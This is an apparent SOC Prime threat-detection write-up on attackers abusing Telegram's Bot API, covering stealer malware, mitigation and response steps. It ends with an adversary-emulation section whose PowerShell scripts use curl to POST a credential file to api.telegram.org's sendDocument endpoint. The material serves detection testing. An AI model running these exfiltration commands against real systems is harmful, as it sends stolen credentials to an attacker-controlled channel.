SOC Prime Bias: Medium

17 Dec 2025 14:33 UTC

The Detection & Response Chronicles: Exploring Telegram Abuse

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
The Detection & Response Chronicles: Exploring Telegram Abuse
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.

Investigation

NVISO’s SOC reported four intrusion attempts observed across October 2025 and March 2025 where Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.

Mitigation

Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.

Response

When activity is detected, isolate the affected endpoint, stop suspicious processes, and preserve command-line arguments along with DNS, proxy, and network telemetry. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any exposed bot tokens, disable or revoke abused Telegram channels, and contain the spread by blocking related indicators. If abuse is confirmed, escalate reporting through Telegram’s official channels and document the incident for recurrence prevention.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid storing a custom binary, they use the native curl.exe (installed via Windows 10 optional features) to POST the file to https://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, ensuring the process creation event records a command line that contains “api.telegram.org”. Because the process is curl.exe, the rule’s filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.

    # Variables (replace with attacker-controlled values)
    $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
    $ChatID   = "987654321"
    $FilePath = "C:Tempcreds.txt"
    
    # Ensure the file exists (simulated credential dump)
    Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!"
    
    # Execute the exfiltration via Telegram Bot API
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    curl.exe -X POST -F "document=@$FilePath" $Url
  • Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.

    #--------------------------------------------
    # Regression Test – Telegram API Exfiltration
    #--------------------------------------------
    param(
        [string]$BotToken = "REPLACE_WITH_TOKEN",
        [string]$ChatID   = "REPLACE_WITH_CHATID",
        [string]$TmpDir   = "$env:TEMPTelegramBAS"
    )
    
    # Create temp workspace
    New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null
    
    # Simulated credential file
    $CredFile = Join-Path $TmpDir "creds.txt"
    "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile
    
    # Build API URL
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    
    # Invoke exfiltration
    Write-Host "[*] Exfiltrating $CredFile to Telegram..."
    curl.exe -X POST -F "document=@$CredFile" $Url
    
    # Simple success indicator (does not verify delivery)
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Exfiltration command executed."
    } else {
        Write-Error "[-] Exfiltration failed."
    }
  • Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering curl.exe processes.

    # Cleanup temporary artifacts
    Stop-Process -Name "curl" -ErrorAction SilentlyContinue
    Remove-Item -Path $TmpDir -Recurse -Force
    Write-Host "[*] Cleanup complete."